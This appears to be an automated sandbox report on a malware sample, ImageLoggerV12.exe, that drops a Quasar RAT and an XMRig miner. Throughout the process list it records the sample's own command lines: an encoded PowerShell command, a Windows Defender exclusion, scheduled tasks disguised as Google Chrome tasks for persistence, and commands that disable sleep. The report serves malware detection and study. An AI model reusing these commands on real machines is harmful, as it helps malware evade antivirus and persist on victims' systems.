Analysis Overview
SHA256
427895a73d7150c8f132f251c230ae0686ee0b89e13e46258f40b0de1cc5e638
Threat Level: Known bad
The file ImageLoggerV12.exe was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
xmrig
Quasar payload
Quasar RAT
XMRig Miner payload
Blocklisted process makes network request
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
UPX packed file
Loads dropped DLL
Checks computer location settings
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Uses Task Scheduler COM API
Kills process with taskkill
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Enumerates processes with tasklist
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Runs ping.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Gathers system information
Detects videocard installed
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 04:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 04:34
Reported
2024-06-14 04:38
Platform
win7-20240221-en
Max time kernel
150s
Max time network
137s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2484 created 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2484 created 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2484 created 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2484 created 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 1152 created 1204 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1152 created 1204 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1152 created 1204 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1152 created 1204 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1152 created 1204 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1152 set thread context of 2580 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 1152 set thread context of 2636 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\cmd.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d06ccb6614beda01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe
"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAawBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAdgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAeABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegBsACMAPgA="
C:\Users\Admin\AppData\Roaming\Logger.exe
"C:\Users\Admin\AppData\Roaming\Logger.exe"
C:\Users\Admin\AppData\Roaming\Logger.exe
"C:\Users\Admin\AppData\Roaming\Logger.exe"
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
"C:\Users\Admin\AppData\Local\Temp\mainPannel.exe"
C:\Users\Admin\AppData\Local\Temp\UI.exe
"C:\Users\Admin\AppData\Local\Temp\UI.exe"
C:\Users\Admin\AppData\Local\Temp\GC.exe
"C:\Users\Admin\AppData\Local\Temp\GC.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\8mbTd3DMDXcp.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\OW6JD8chsys1.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\taskeng.exe
taskeng.exe {F077E9DC-6E8D-479B-82D2-FB2B942A3C40} S-1-5-18:NT AUTHORITY\System:Service:
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hNj8dLCpeuVE.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\00g2gVcSyRhW.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QwwxGfA6QUkv.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\pYMwTFGAHQ2t.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\PWtLsFpYfhkR.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\8NAkI7HXDSwK.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\UF3GWPm9T8OF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\t8QscWpZLsLL.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\BvgSXlCAmp3Q.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LljIFbu92D2Q.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\mZZNrjWgmwdt.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\rbf5PHVW1ZFD.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | NareReti-40382.portmap.host | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
Files
memory/2152-0-0x000007FEF5A63000-0x000007FEF5A64000-memory.dmp
memory/2152-1-0x0000000001060000-0x000000000538C000-memory.dmp
memory/2152-2-0x000007FEF5A60000-0x000007FEF644C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Logger.exe
| MD5 | 90a149cf408f4173e445ec61c7c5a418 |
| SHA1 | 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3 |
| SHA256 | bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2 |
| SHA512 | 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f |
C:\Users\Admin\AppData\Local\Temp\_MEI27642\python311.dll
| MD5 | 5792adeab1e4414e0129ce7a228eb8b8 |
| SHA1 | e9f022e687b6d88d20ee96d9509f82e916b9ee8c |
| SHA256 | 7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967 |
| SHA512 | c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b |
memory/3060-38-0x0000000002AF0000-0x0000000002AF8000-memory.dmp
memory/3060-37-0x000000001B790000-0x000000001BA72000-memory.dmp
memory/2892-40-0x000007FEEBBA0000-0x000007FEEC189000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UI.exe
| MD5 | a6d1f2686c50110de2fd76df4dcb7057 |
| SHA1 | 75f47ac32fada1bb9371b45006c2b1744347790a |
| SHA256 | ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446 |
| SHA512 | f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66 |
C:\Users\Admin\AppData\Local\Temp\GC.exe
| MD5 | b2bcd053c6452f8a04ba108d850f9781 |
| SHA1 | d69a9b01e46a84347317f93898c270b0df1fd4ca |
| SHA256 | 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec |
| SHA512 | e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe |
memory/1940-59-0x0000000000C10000-0x0000000000F34000-memory.dmp
memory/2152-60-0x000007FEF5A60000-0x000007FEF644C000-memory.dmp
memory/2432-61-0x0000000000070000-0x00000000000E6000-memory.dmp
memory/2948-67-0x0000000000250000-0x0000000000574000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8mbTd3DMDXcp.bat
| MD5 | 0f4ad0c4790401594fdee7a9c68eafaa |
| SHA1 | 48f6313b8b17b12ba8567431caa795e5d2a511db |
| SHA256 | 7a240954f6b4fb98b192bc70f9234f647c987fdcc90a9b7d07b349df6045ab55 |
| SHA512 | 2e4f3d10ebfaad3872e95e98b6f5e808020578b33dec1d5f019d8179cbb442fcedd9ef366117594351aab3e7b799d796b1d2c2814b0dd9a9fdb33338f1cd06af |
memory/2484-78-0x000000013FE80000-0x000000014370E000-memory.dmp
memory/2680-80-0x00000000011C0000-0x00000000014E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\OW6JD8chsys1.bat
| MD5 | fd63680c28e392a2f9d54ae4db47edf5 |
| SHA1 | 372d9d69dc54009b5342f0da65b4e0aa0c3b2839 |
| SHA256 | 47ef6b58103987c199e28a2a200109bcaee35372173806900315ea5fa2864881 |
| SHA512 | 1056e155eefa3228e7971a3e2c3c2495a1793ca541ae4b15158e3341b75b68395e29b49bd64b5332ba1439be26aae403bf42eb0d996bd28497303889dbb753d6 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a89eed448323143d3453a6c4e422e7e1 |
| SHA1 | 730952e100a4a7b7cb0baf23a6b9ff0aa8803fe2 |
| SHA256 | e2e93278bea136ad0c63ddc16de9b1efc0b0376b3fd1edc4ffce24936643e415 |
| SHA512 | 074a7e514f7abf5bb898cd2cc5b7d18c6ad47d77ec8c64e3a0245edbfa38fd0e53620c95db62041d182911114acd40b1b9ba3392e4b72e0b5049d45302170f8c |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2236-97-0x000000001B5A0000-0x000000001B882000-memory.dmp
memory/2236-98-0x0000000002190000-0x0000000002198000-memory.dmp
memory/2112-104-0x000000001B520000-0x000000001B802000-memory.dmp
memory/2112-105-0x0000000001DD0000-0x0000000001DD8000-memory.dmp
memory/2484-108-0x000000013FE80000-0x000000014370E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\hNj8dLCpeuVE.bat
| MD5 | 98f929d0e5a0a78a9bebb785350daf8d |
| SHA1 | 70a85e6a79e893bff38341eaa99720f3c2ba0fa7 |
| SHA256 | 3af72e792f6b3d13e63f83b42f0da22ffd9741c1adb50da501e28bd275196224 |
| SHA512 | 0c14c7436b868f70323b0b73a91a2354276fbf0d9aa4b5f6e77ac179c5d0cc6a9fd80cff62fc0f5db84c2e8496f66d687cf8220996cd945cffa4b4fe8c8cf17a |
memory/1152-123-0x000000013F070000-0x00000001428FE000-memory.dmp
memory/2760-125-0x0000000000270000-0x0000000000594000-memory.dmp
memory/2636-130-0x00000000002B0000-0x00000000002D0000-memory.dmp
memory/1152-131-0x000000013F070000-0x00000001428FE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\00g2gVcSyRhW.bat
| MD5 | ccb21d66e065e337e3254ca946da294f |
| SHA1 | 85d962832d6d8ba590fd43b00a0fa8987417edaa |
| SHA256 | 229b6b26b3b997e830aec2a24af29d15999754e2f96c62e7ae7347dc510a0c81 |
| SHA512 | 0edfba0f21e49776cb2a09afbfb168e8a4f5f415a16af0fd01d830554328ac66302d892e493c4fb3ef4e944cd38496790e45f9efcee080d6af0d5269f726202e |
memory/2580-141-0x0000000140000000-0x000000014002A000-memory.dmp
memory/2636-142-0x0000000140000000-0x00000001407EF000-memory.dmp
memory/1796-144-0x0000000000C30000-0x0000000000F54000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\QwwxGfA6QUkv.bat
| MD5 | 45a2b978bf7491518746f9616517fae2 |
| SHA1 | cb5dda526bbdc14304d42469b61c68259af7ea4e |
